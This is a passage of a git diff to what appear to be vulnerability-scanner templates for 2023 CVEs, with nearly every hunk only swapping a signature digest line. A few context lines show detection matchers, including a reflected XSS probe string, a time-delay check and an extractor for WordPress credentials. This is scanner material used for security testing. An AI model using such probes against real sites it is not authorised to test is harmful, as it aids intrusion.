a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009203ff14f4788be7f710de96ec1e65ac2311d0637c4281a015d9226ca1709ea2022100a98a180fc53a625defdcb5d20cf9af65a80367a6b3038691639b348e439fcf35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220264ec173015f4ea1e9fb57f0cdf16a11941fa1565929316826a6469a7f26356b022100f9d06900340addad7bbbaa2d4df42eb4966fff7fe48485094749dff3fef84e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 1d84f32c3b..b70e7ae6a4 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(base64_decode(body), "PrestaShop", "") && contains(body_2, "facebook_urls")' condition: and -# digest: 4a0a00473045022100fbf4beb7caa46ad11a7ce26fdbfaa88016713b04d71ece5c2635a31913986a8a022003212b2b9c49bf77654e33bcb134a805bf48735fe3d357705f393d0f741b050e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e3e768c0de86a746c4efad68576e82bc1fa30922c43c8345f523acf95f0f30e0221008f34d738ed0acf80b92b4989211cd0d3d817649036f5e72399ffc23ec8159866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 3a3c9cb5b6..7c973b8f15 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -70,4 +70,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100b9f3f94f8eac8f481fa37610517d4174d804c15fb6c2366af1454af3e67d8f7f022100e00fda96533e49cc81cd52e25a7d17b134bf5201a894e857e353238bed1010fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9043550aed8b81e9ef9db8d60bdafbd3e317d5a4380bada21e2c40a59eb701202202e91c365dc6c67fdf939724bcad96bb24674d20e4b986917b5fa9c81195eb8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 62ad02ec9a..c716a7e7ed 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -50,4 +50,4 @@ http: - 'contains(tolower(body_2), "_newsletter_")' - 'contains(body_2, ">")' condition: and -# digest: 4a0a00473045022100e506db446bbe84801062c7573c8d84d6ac3ac2ac861ce5c6e47276cdbfb77f59022037128f43f6e7c992b7095c03a9f8b44e439c994df9f4e8ad1656fd84df42dad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9167be2b724059df7c707ba66c0e23021841497843387e22cea0938486d9c22022100b72c351c3b3cd00ab824a438f1cb818d13fbcabf2a0980ae0e165e839b80686a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 8c1c66213e..bcf8ef4748 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096c8ac8513c2959653cc0dbb1254ba29a23c8f656c9386fc58765c9cdfc94a3a022100e79e136345ab9f545e2ae7c9bddddd959e9663aa61fd706c65902efa636d7c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004a22adc5e62f7794b752c4457a45b432b9e299bc1a0687fb7d826283467f0c102206da3d7c5151e2c6429db61cf12879cdc938473c651fd24f8188dfe64cbad202f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 761e2db016..fbeb5c48d0 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -74,4 +74,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4a0a0047304502201f8fb3d0297a76be68c1aaf7e1947bdcc2d20b4194a143aed488388dda746e1b022100eba2f04ded607ea70367c52c9db1c815ddcf252eb554d4b7413373f5073c53be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220628cd93a9f24e6da21aa191838a4414fde4b236271358e675d6292e2cfd6d9c60220242c94de0f75a7e3169ec197bf0a52235bf43e44525fe668bb487845ec35c26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index fcd204123a..a2c633d558 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100867ffb49a0eda2059b75af70ac9ec0eda4767fde5735118fc96a82a2276abbeb022009ab8b1e54d2866629f2bc73bd048266c2f69b84c1c82c83d02e824b7ad2bae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220748f6543ee77c349ea3b0c947703b6dddbefb5ef22d0d1f526df20906e14a39c022100df4ecac49f01e90b8646b10d421ba2ce78103f5e5e463bd9ac3a969625144f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 9dff7a231f..32f6ae8a7f 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032320b6050dff9ab27355a70a59fc91e1a93cbcc3b7baf66112f6c7d2338fb980221009fecbd343a9c563dca53df1617986c480cc2132911bcf89cdfb687ecd9590ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055aa8107bd7d4d0fff2c0e8689d5dcf8d5325b11639dbcf31479cb2207825612022100b4ee88e610a2506569a49715d63d2c174cd346a6cd0a86c303baf4e227a1bb3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 787dee5950..7fd7b59455 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -212,4 +212,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf8fdde8726815d587a1a5a92c0a748c63b2c0ded1c58cd824f3b4e26b98ac0a02201495555a41cfb23fb565e0c5151f37c8257b5adc230d11c0a821899c594614f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index f585a3339a..4020684296 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206320054830cbf1ad38ede41ae779a7b91200b4c6551c8237690c44271c9427480220599f337a011a66a04ef3cf978324a583550dcb6ddf4d951d27099781fa04bb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007bff5910c7995c188ae6031143eb43d7170ad3caea04a1eb6ee71c0e026e29202201779c8cc2c73090961a6632e0d0309178e9e50be5f9c4145c926fecebe300cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 5ca8a98bc4..3d6e1da347 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc34538c0cf40fb3489d8f091c41bcf45f66c43266a4c6a2136aef40acbe67b702200d93d6082e5e272bc01f1e8222ec9521c32be40f912837b32aa6c0e6dcd75a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f10317bc778c143c3d7478b59fe0b05d35be98354746dd591670fc3da0e14d1b022100cf2d8f74f7ce084df301605b9e617795d4618c88262e6f3ca007ba1480c1c520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 29a46f059e..a46f1b5e89 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -60,4 +60,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 490a00463044022021b0065afd452b596019be1f29280c7188acefb68b151f4424790005959092ce0220570d61411787677f1f9159c72796d6bda6e7f3213de0c8314053f75bea9749bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3031ce2694ea298cae571806359cd762818fe85e602bfbe76c2c2d7e0b228f00220120f98c33381b0abc660138bef1a04a77b197e0dc137498a4f1201bdd99c0769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index bd09147e59..12a44c9543 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "pagination\":")' condition: and -# digest: 490a0046304402204eaa8609f06c3eefd7564d1851a570331a2ac0bdf7ea82a8c2c34713f0b076f302201c7005deb51e36e71ebc1d754186d83f8bb170a0db558b3f6e3640044d4b2df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eda48bd92500604d2c7f795dc9f29ad02cbd296ff04dd078f0ad9d0e756275d00221009f72e58aa25cb6db4550d529e6afade4404ed735bba95f58e3653646bafc1558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 01974f4433..fb1465e52f 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -79,4 +79,4 @@ http: kval: - admpcsrf part: header -# digest: 4a0a00473045022002ea2f37839931bbb9a9c24fbf58223344569d7d295c6bd5820a686bf488e79e022100c8f6cf28389ef9d5215945629bfaefe1adc0cc3089553c0b049600c78a8be185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b40c67a84b05f52a1cc250c89d9d44375d1a0c33d9f1bc54e9d63819b04e2e00220698ec8d0a6e93ac02207ffb5042b97f54896736e55568b992c616c8dc5924bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 615ee4c5c7..77b69e710c 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -50,4 +50,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4b0a00483046022100854b6eedcf29b9f4407257626ca8289e18e931c840b7de9f4b781403aa4f3a30022100feffcad1c0d953b462a696ee3037425fdf8f9135d309379ed44a08c874fc6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027bbbb37fc821c50655b071bef1a2bf081ddc50fb8473bae86f68d983d389ad7022009ffe3bc97a7e6c05d11866250e415c88d3a2c321554737feb16f1ccb2d50a6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 4348a5cf2b..6e6f180d4f 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -51,4 +51,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 4b0a0048304602210082b4c6e19acbd6bc2d2776e029a0c8543657d42b874ca648fef7b0cf47d5dd43022100d87b306d094f7b7d7be74eb279feb8df0607d5454f6bf71f832f9259e2297d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220231dfa335a027f270199925553ccb0928bc3b01871e5736ba629f40ad0ebb75c0220406e03fdb933e233d4a74fd3259905198f64755be40f8d47debe0308ee6589ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 1e5f64ba57..4fe89549c6 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -63,4 +63,4 @@ http: - Email - IsSiteAdmin condition: and -# digest: 4a0a00473045022100a58b5e92e169683723b78b9760e3fad647f399485f44d9584acd92634703bd4002207541b9a7ffa8755cb4b72e225027d86fd2dfccaae6168bf6e3428abcdad5ef60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e666a0b9715202ee359d1fd474d260eda571d7d312dab6ba7de3a0a4b308a3602206ee8a80fa4e39d57247a3ec6b3a19b05b62f7c67683f1f74b42ff6efa0721df2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index 387586c233..b02f5ffa0d 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051404fd5879c74f26f3e3d20328728775676899601fe56240a8c3865b521c780022100c0508c953de3425517b071c0abbd29036e2b125ba1af7a21b20557e1107caf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a35033a9084161b8e269f87a994abd179878f15d72253d472fb749ac232026b022100efc52768b3bbb3b843a30408c2efa8845dd476bfb311d1d56ca5b5899f15218a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 7796934275..74721e7b72 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -40,4 +40,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save")' condition: and -# digest: 490a0046304402201f348c1ad965519aec601dea4e3594a4203bb91d9386861d1e29e43cfc7f69de02206a1be3fef962ba9fa56678781c5c622f895d192dac29bdfc696cee29e7e75608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7cadcbcaa1a7665229854ebaa4d08fcf1f2b6fb6a15908df680b2d446b0b86202210083954a6783e65764efc3588e55d8ea452bf55242625f493136254ed1883cffd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 291dba12ef..2e81f35956 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502200544d1f287ef41ae3cf088e290845e98c86d059cde854153d5728b086b85bdfd022100a7c78b65dd8998d0e467a3f16f1088a53834df949f7eb311ad454545bb94a924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008376e46452318581c50834298bceb24539a0418601492e3ae72e6904f41fc18a0221009541094acf9e27d674a191eca9493d663d23bb9ce30b468cd40a06c56d1e0196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 8a280e65d8..e52254663d 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "openemr")' condition: and -# digest: 4a0a004730450220108fa66c2cdc6c8b7680bd5104e88e717b840d2571b4c6ad031c039f4eb9ccd6022100b75192c2cd5ddb7e9874af2830784c6516ea54684cde65e41b82e565b835337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f50082774b8a04fe0da88764e4cf37faa12f335b2161b2c5a4f8cfc8a07243e0220618e372046f1e82da6220c6a51af3312cf3bd8be2acdd8d3a99c1768bbb5bf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index e17ed58564..1449ca693b 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect")' condition: and -# digest: 4a0a0047304502205d36519b2b9f835993cdd262417eb59d35354c534b521ef5fb2370a1c458c9a8022100c1e191f5a47e74a627e434f122480e556641bbcac52be4eb662700639ef081a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index fc3fca33d9..cf869b7479 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019bdab29e51dac4ed47397495129a499977a1bcca1b6f4aa9fb44263cd1fd6e102210085a75d4c523c5f312ddc0094d76eadb0df067f909c152ea57a61f08803e30f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc71821162025f268ee5de222f4750561754c1016a473fd7d517ef248346aab3022100ac4cfc3d8539f0cf3e45603921ce9c36ebc9d9bc6791db60bf92773225d50f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 02789b70ce..1e17136867 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100afeced594594dd08a04c07ba80120871493fa8c243e6b0ef758019f4c205e85b02200230f234069d1a181ab48796a446082f79a84ea10df897f4a908d19937430551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c28840dd8c5d877ad17fee5a4648ac22eb280a8543450e50cb4787c1ee46b1a022100b8173ae2b3d38dadfb44dc8dc366e496b370d100b05b48f88dd3aa2099f80896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index dd030fe1a8..191862087f 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -45,4 +45,4 @@ http: part: body words: - "You are viewing page number" -# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b0d567d7b052cf62884dfcdc0e21acfb8536feb3229ec67fe84d1c196e98d1802202c527d6fcfe222cfe243a865c16f552f10e595e0539804f9d3bf191a972b7e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 19915b1819..0d4b60c14e 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6a10d91f4e2d28dc442dc69d39787fca8f48d3665e1aa5b7302f46d7e64adb50221008092f2e0bfd73056671fafbd4c51267037ee1b7dc14bb039da07d3cc9d932712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005705319fbc90464db11a2808fdf787408f2afac55b623fd0b9f8762003f871b022100a345f4f918983f4b23c2b0d88e62b9122872ebcaa97b2632ade1ce647c182003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index c13b61d3fb..c6f2618ba2 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd7ddf822741cbb8cb540da455a368436390b59002c7d45d86ff3b215e5c0031022100b790118b57ec90b22542dd1430c2322ddd5a973995928cadab5c6ead98895a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200222f56a5044bb3a018ef5451cbc61aa44e58341f8e85b5120fba2332dc8a57b0220349c5a2c3e0ac6778bf1d3344349a0b06dad52bbf12d4fb0534ecd56b3bad6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 481b36b276..67ff1e908b 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bfbf1a8c87f9cb5f380257f32742fe3fbfc2ca545f5b61c3df52cb89048fb3b6022100a84526343d726f724f54e529c4771d5ee2037c66a32041da550cb9f158ef4fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e941ced09ce8917e972560b5828553b40a72918b13273cc08f4f262919ae16e8022100c1576c24d5b7aa9f220ae12b1eac49850b3f6fc175c608150d0f1351110a9b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index d583d153f9..24a9d83dcb 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e5f7965419954c1523bd95cc68756e7f62b769f31076e1ff2e08194e254dc30221008f9246b5ee4e77f13e735e7b0b05b95259fcc150a4197f844348b56a200d8160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008b18b847db968082c86449021bb14ed029390e8de0a2accc64eaa62424f94750221009691a1cb12ea29b0fbc1ede7da1a63f955ec6af74157a14bc83cc16989e1e410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 7b305e3445..ce7f0f190a 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de27474750e6704be6c10312547cdcae9d5fe1ef0ebb3501e7c8578e86e08d04022079ec35ddfb361ca3c6a39ed726e6e93da9077976851ec3bbff7a43e4204a5fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f4324b8d2cb69442b92a26914965f4d748dc23f82bbc7b0b14fd9b2859ce056022100842c47e8155cd53ac8552440f6d1e5980f0732976cacdb7a5c3b269793f26300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index d6e7cfa5b3..870bfd5717 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 422 -# digest: 4b0a00483046022100f3383f2fbe7492efe4c31cc6431f25c5c5452d34e74b93108f7c4b44ed91fdd40221009ac4be31a0cff9f9737fcf1893fa400e0933a2863cec4612c7640ea4081d6c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4c72352b5a278fe9fe14d659d3e7eca5ceeff07f6a2cdae1fb97ac844bc66da02201d4636487109429fb610844b1c7d86e88b9231569dc4c3d0483183c083d3c341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index f7aff3b56b..0abb5d4f6c 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -47,4 +47,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4a0a0047304502204f8f5546a345ebd6679d7326c8be4fdd9b4634f7da41d4e2a2371aa32354f8eb0221009d47704569e5ce942252fde8c0426bb71442d5f994d5aba7fb3f593b0e865e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b46183e33550da37ab7121e63b0622beb705ae54ab98563678cad4f92a273dec022100f6a8e4c8d114c476ea6f14bc62d7ebad0a6dbcaa64328c6f3f939d38b044bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 50a5e1519b..a57620de22 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210084018e298a44acee3c2d3eb1556a8f01d7bf0139042553405d0073a774a97c48022057112439e4e35da6bbcb04cd8784377c767d0926a15aaac91a851caa83703256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e51be3a217490c7c4de70ac04fb0b0431a51b8fac4ffa6d6639ca0e89b4e0e30022100af07b85973c4cb21873160e102defa8952df672fd3dcbe651fe48656e79e23c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 2189a95c4e..5dd436dbcd 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220634ca8a4ffd62bcb105aa07c8ed88c6b4c618002ce8971aed027cc69314c0293022100fcef9a2e98705ea6414ef80562a5b57e55c0340f6d7cf6020b1361769ebd8faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c32a30b9bc28b78bb36d839cac2ff6aa2f71f4a2ab78de882a2479cd3d7373f9022100ae591bbcff8497cc91817ed216fae39f7a9191562cdfb7884378410f8f221d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index c934e88c87..1fb78a3c0b 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100912b0803a7e5455d57a52707fe3ca217b6ce59f4cb312a7d20d93ed4d511c02c022004941e8d87c4edc496584e35ce2e3b2e5d1ce821828c03985db9ac734c6a4733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220299c58ac9d6a22e1c49ef45f97057ebad174785e1ec42d9b942926d1a73e5dca022100a786b9078630f2acbfe99f890a7fc9e4f487ab208a16be633daefac19163d791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index 8566de4134..04e479bc8f 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049027c19b0bf6f58b9b44aab3c55056e970467a85cc9e82b6a50722567aa4c0e02203a12757fe04db9aefaac1ade55009e909a82de1087a9ab7aa8d6511dd928d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a071fe2d4bc54efa5a79cba38c20d2fcd7bb69536fc983c156b52ca187615775022079222e249bf01f2e55a560999af2aaf0c538e1a05be8152114ca492a3deffbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 317126eea6..dd6a3dacd1 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -76,4 +76,4 